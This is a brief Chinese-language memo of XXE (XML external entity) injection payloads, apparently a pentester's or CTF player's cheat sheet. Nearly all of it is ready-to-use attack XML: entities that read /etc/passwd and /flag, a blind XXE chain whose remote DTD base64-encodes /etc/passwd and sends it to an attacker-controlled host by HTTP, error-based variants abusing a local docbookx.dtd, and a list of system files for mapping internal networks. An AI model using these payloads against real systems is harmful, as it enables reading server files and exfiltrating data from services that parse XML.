记录一下常用的 XXE payload。
想到啥写啥，只是一个备忘录。
引用外部实体
SYSTEM
<!ENTITY xxs SYSTEM "file:///etc/passwd" >
PUBLIC
<!ENTITY % remote PUBLIC "dtd" "http://127.0.0.1/evil.dtd" >
常规 XXE
通用实体
< ? xml version= "1.0" encoding= "utf-8" ? >
<!DOCTYPE test [
<!ENTITY file SYSTEM "file:///etc/passwd" >]>
<test >
&file;
</test >
参数实体 (利用 CDATA)
< ? xml version= "1.0" encoding= "utf-8" ? >
<!DOCTYPE test [
<!ENTITY % start "<![CDATA[" >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY % end "]]>" >
<!ENTITY % dtd SYSTEM "http://127.0.0.1/evil.dtd" >
%dtd; ]>
<test >
&all;
</test >
evil.dtd
< ? xml version= "1.0" encoding= "utf-8" ? >
<!ENTITY all "%start;%xxe;%end;" >
Blind XXE
payload
<!DOCTYPE test [
<!ENTITY % remote SYSTEM "http://127.0.0.1/evil.dtd" >
%remote;%int;%send;
]>
evil.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" >
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://127.0.0.1/?p=%file;'>" >
Error-based XXE
引用本地 dtd
< ? xml version= "1.0" ? >
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ELEMENT message ANY >
<!ENTITY % local SYSTEM "/usr/share/yelp/dtd/docbookx.dtd" >
<!ENTITY % file SYSTEM "file:///flag" >
<!ENTITY % ISOamso '
<!ENTITY % eval "
<!ENTITY &#x25; error SYSTEM '%file;'>
">
%eval;
' >
%local;
]>
<root >
<message > 123</message >
</root >
多层内部实体嵌套绕过，无需引用外部 dtd（是否生效取决于解析器是否允许在内部子集的标记声明中引用参数实体，需按目标解析器确认）
< ? xml version= "1.0" ? >
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ELEMENT message ANY >
<!ENTITY % file SYSTEM "file:///flag" >
<!ENTITY % eval1 '
<!ENTITY % eval2 "
<!ENTITY &#x25; error SYSTEM '%file;'>
">
%eval2;
' >
%eval1;
]>
<root >
<message > 123</message >
</root >
获取内网网段
/etc/network/interfaces
/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie